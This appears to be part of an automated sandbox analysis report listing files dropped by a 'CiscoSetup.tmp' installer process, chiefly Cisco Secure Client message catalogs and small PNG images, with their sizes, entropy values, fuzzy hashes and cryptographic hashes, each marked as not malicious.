                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):366110
                                                                                                                                      Entropy (8bit):5.203256685903476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                      MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                      SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                      SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                      SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):366110
                                                                                                                                      Entropy (8bit):5.203256685903476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                      MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                      SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                      SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                      SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362312
                                                                                                                                      Entropy (8bit):5.179123156153952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                      MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                      SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                      SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                      SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362333
                                                                                                                                      Entropy (8bit):5.410491653751883
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                      MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                      SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                      SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                      SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348721
                                                                                                                                      Entropy (8bit):5.110965971564126
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                      MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                      SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                      SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                      SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388375
                                                                                                                                      Entropy (8bit):5.9662824242248815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                      MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                      SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                      SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                      SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):357929
                                                                                                                                      Entropy (8bit):6.014691052026819
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                      MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                      SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                      SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                      SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347088
                                                                                                                                      Entropy (8bit):5.137429334753401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                      MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                      SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                      SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                      SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):352370
                                                                                                                                      Entropy (8bit):5.387002164805478
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                      MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                      SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                      SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                      SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347902
                                                                                                                                      Entropy (8bit):5.1986177425205575
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                      MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                      SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                      SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                      SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):467531
                                                                                                                                      Entropy (8bit):5.410391422981112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                      MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                      SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                      SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                      SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312691
                                                                                                                                      Entropy (8bit):6.238069670792444
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                      SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                      SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                      SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312691
                                                                                                                                      Entropy (8bit):6.238069670792444
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                      SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                      SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                      SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312693
                                                                                                                                      Entropy (8bit):6.237794032422467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                      SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                      SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                      SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313019
                                                                                                                                      Entropy (8bit):6.234654802477353
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                      MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                      SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                      SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                      SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313017
                                                                                                                                      Entropy (8bit):6.23496399047262
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                      MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                      SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                      SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                      SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3882
                                                                                                                                      Entropy (8bit):6.743390042757195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                      MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                      SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                      SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                      SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3884
                                                                                                                                      Entropy (8bit):6.749338244156901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                      MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                      SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                      SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                      SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3880
                                                                                                                                      Entropy (8bit):6.742220289284142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                      MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                      SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                      SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                      SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3881
                                                                                                                                      Entropy (8bit):6.749191813135782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                      MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                      SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                      SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                      SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):431993
                                                                                                                                      Entropy (8bit):4.565786626694248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                      MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                      SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                      SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                      SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1807
                                                                                                                                      Entropy (8bit):7.846793911413473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                      MD5:536C911881523B9F8402A481881992A0
                                                                                                                                      SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                      SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                      SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.139959170245274
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                      MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                      SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                      SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                      SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1916
                                                                                                                                      Entropy (8bit):7.856747119568193
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                      MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                      SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                      SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                      SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.268682924293009
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                      MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                      SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                      SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                      SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12558
                                                                                                                                      Entropy (8bit):7.968059020803266
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                      MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                      SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                      SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                      SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2860
                                                                                                                                      Entropy (8bit):7.914852791051157
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                      MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                      SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                      SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                      SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51094
                                                                                                                                      Entropy (8bit):7.977081753425093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                      MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                      SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                      SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
